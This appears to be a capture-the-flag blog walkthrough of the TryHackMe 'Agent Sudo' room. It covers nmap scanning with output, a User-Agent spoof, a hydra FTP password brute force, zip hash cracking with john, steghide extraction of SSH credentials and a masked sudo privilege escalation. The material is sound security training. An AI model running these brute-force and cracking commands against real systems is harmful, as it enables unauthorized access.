Welcome back to another TryHackMe room, the challenge today is Agent Sudo.
No spoilers within the hints below, just some good ol' fashioned hints to help you out on your Agent Sudo journey. For more detail, with some spoilers, see the Steps section, and for everything I did, see my Notes. If you prefer a video walkthrough, that's linked below, and if you want my personal thoughts on the room, check out the reflection in the video.
Disclaimer, there are spoilers for this room below, please use the hints if you do not want any steps spoiled. Room creator credit: DesKel.
Hints
Task 2 Enumerate
- How many open ports? `nmap` can show you.
- How do you redirect yourself to a secret page? Read the note on `index.html`.
- What is the agent name? Use the web dev tools to change `user-*****`.
Task 3 Hash cracking and brute-force
- FTP password. Use `hydra` with `rockyou.txt`.
- Zip file password. Use `binwalk` to really see the `png`, then `zip2john`.
- Steg password. Use `steghide` to really see the `jpg`.
- Who is the other agent (in full name)? `cat` your new `message.txt`.
- SSH password. `base64 -d`
Task 4 Capture the user flag
- What is the user flag? Once in, a simple `cat`.
- What is the incident of the photo called? Use OSINT via Bing.
Task 5 Privilege escalation
- CVE number for the escalation. `sudo -*`
- What is the root flag? `cat /root/root.txt`
- (Bonus) Who is Agent R? See `root.txt`.
Steps
- Task 2 Enumerate. As always, start by scanning the machine; I used `nmap -vv -A <ip>`. We can see ports 21, 22 and 80, so most likely we have a web server running. Let's confirm this.
- Visit `http://<ip>` to get the next clue, then change the User-Agent by going to Inspect (DevTools) > Customise and control DevTools > More Tools > Network conditions > User agent. There you can set your own User-Agent by unchecking "Use browser default". Reload the page, and you're done!
- Task 3 Hash cracking and brute-force. That leads us back to port 21, FTP. Now armed with a username, let's brute-force the password: run `hydra -t 32 -l ***** -P /usr/share/wordlists/rockyou.txt -vV <ip> ftp` against the target and you'll find it, then log in with `ftp <ip>` and `mget *` to copy all the files.
- It's time to examine what we've found. Run `file *` to show some basic info, and `binwalk` to show hidden data within the files. Then `binwalk -e cutie.png` pulls out that data; running `file *` again helps with the new files. Use `zip2john 8702.zip > 8702.hashes` to extract the hash, then `john 8702.hashes` to crack it.
- The new text file provides a cryptic message; we can decode it using `echo ******** | base64 -d`. That's the steg password: use `steghide extract -sf cute-alien.jpg -p ******` to gain SSH creds, then `ssh *****@<ip>`.
- Next up, Task 4 Capture the user flag. Copy the files over via `scp -r * *****@<ip>: .`, use a bit of OSINT and find the CVE. For more, use my notes below or the hints above for help, enjoy!
Notes
nmap: `nmap -vv -A <ip>`

```text
Completed NSE at 02:52, 0.00s elapsed
Nmap scan report for 10.10.253.182
Host is up, received conn-refused (0.32s latency).
Scanned at 2022-07-06 02:51:25 EDT for 42s
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5hdrxDB30IcSGobuBxhwKJ8g+DJcUO5xzoaZP/vJBtWoSf4nWDqaqlJdEF0Vu7Sw7i0R3aHRKGc5mKmjRuhSEtuKKjKdZqzL3xNTI2cItmyKsMgZz+lbMnc3DouIHqlh748nQknD/28+RXREsNtQZtd0VmBZcY1TD0U4XJXPiwleilnsbwWA7pg26cAv9B7CcaqvMgldjSTdkT1QNgrx51g4IFxtMIFGeJDh2oJkfPcX6KDcYo6c9W1l+SCSivAQsJ1dXgA2bLFkG/wPaJaBgCzb8IOZOfxQjnIqBdUNFQPlwshX/nq26BMhNGKMENXJUpvUTshoJ/rFGgZ9Nj31r
|   256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHdSVnnzMMv6VBLmga/Wpb94C9M2nOXyu36FCwzHtLB4S4lGXa2LzB5jqnAQa0ihI6IDtQUimgvooZCLNl6ob68=
|   256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOL3wRjJ5kmGs/hI4aXEwEndh81Pm/fvo8EvcpDHR5nt
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:52
Completed NSE at 02:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:52
Completed NSE at 02:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:52
Completed NSE at 02:52, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 42.85 seconds
```
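As an added example (my own code, not part of the original writeup), here is a small Python parser for the port table in that `nmap -vv -A` output; it answers the "how many open ports?" question from a scan transcript and tolerates ports with no VERSION banner. The sample input reuses the two port lines quoted above plus a constructed `80/tcp` line, since the notes say 80 was open but its banner is not quoted.

```python
"""Parse the port table from 'nmap -vv -A' normal output and summarise open services."""
from __future__ import annotations

import re
from dataclasses import dataclass

# With -vv, nmap prints a REASON column (e.g. syn-ack) between SERVICE and VERSION.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"\s+(?P<reason>\S+)\s*(?P<version>.*)$"
)


@dataclass(frozen=True)
class PortInfo:
    port: int
    proto: str
    state: str
    service: str
    version: str  # empty string when nmap printed nothing in the VERSION column


def parse_ports(nmap_output: str) -> list[PortInfo]:
    """Return one PortInfo per port line; NSE script lines ('|' prefix) are skipped."""
    found: list[PortInfo] = []
    for line in nmap_output.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            found.append(PortInfo(int(m["port"]), m["proto"], m["state"],
                                  m["service"], m["version"].strip()))
    return found


def open_ports(nmap_output: str) -> list[PortInfo]:
    """Only the ports nmap reported as open, in scan order."""
    return [p for p in parse_ports(nmap_output) if p.state == "open"]


# Constructed sample: the two port lines quoted in the notes, plus a constructed
# port-80 line with no version banner (the notes state 80 was open but quote no banner).
SAMPLE_SCAN = """\
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOL3wRjJ5kmGs/hI4aXEwEndh81Pm/fvo8EvcpDHR5nt
80/tcp open http syn-ack
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
"""

if __name__ == "__main__":
    for p in open_ports(SAMPLE_SCAN):
        print(f"{p.port}/{p.proto} {p.service:6} {p.version or '(no banner)'}")
```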
Visit: `http://<ip>`. Changed User-Agent [Link], redirected to `http://<ip>/agent_C_attention.php`, found name Agent C.
Attention *****,
Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!
From,
Agent R
Crack FTP: `hydra -t 32 -l ***** -P /usr/share/wordlists/rockyou.txt -vV <ip> ftp` [LINK]

```text
[21][ftp] host: <ip> login: ***** ****password: *****
```

Logged into FTP with `ftp <ip>`, ran `mget *` to get all the files.
Examine images: `binwalk`, extracted image data: `binwalk -e cutie.png`.
Installed `sudo apt install 7zip` [Link, Link], `7z e 365.zlib`.
Cracking zip file [Link]: `zip2john 8702.zip > 8702.hashes`, `john 8702.hashes`
```text
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 78 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
***** ****(8702.zip/To_agentR.txt)
1g 0:00:00:00 DONE 2/3 (2022-07-08 01:35) 2.222g/s 101044p/s 101044c/s 101044C/s 123456..ferrises
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
`cat To_agentR.txt`
Agent C,
We need to send the picture to **'********'** as soon as possible!
By,
Agent R
Finding hash value: `echo ******** | base64 -d`, then `steghide extract -sf cute-alien.jpg -p ******`.
Hi *****,
Glad you find this message. Your login password is ****************
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
*****
Connect via SSH: `ssh *****@<ip>`, copy over image: `scp -r * *****@<ip>: .` [Link, Link].
Ran `sudo -*`, searched 'exploit sudo ************', found exploit sudo ***** *********
To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
Your flag is
********************************
By,
****** a.k.a Agent R
This is day 54 of #100DaysOfHacking on my Hackers Learning Path. Subscribe for CyberSec updates or read more; happy hacking, coding, and learning.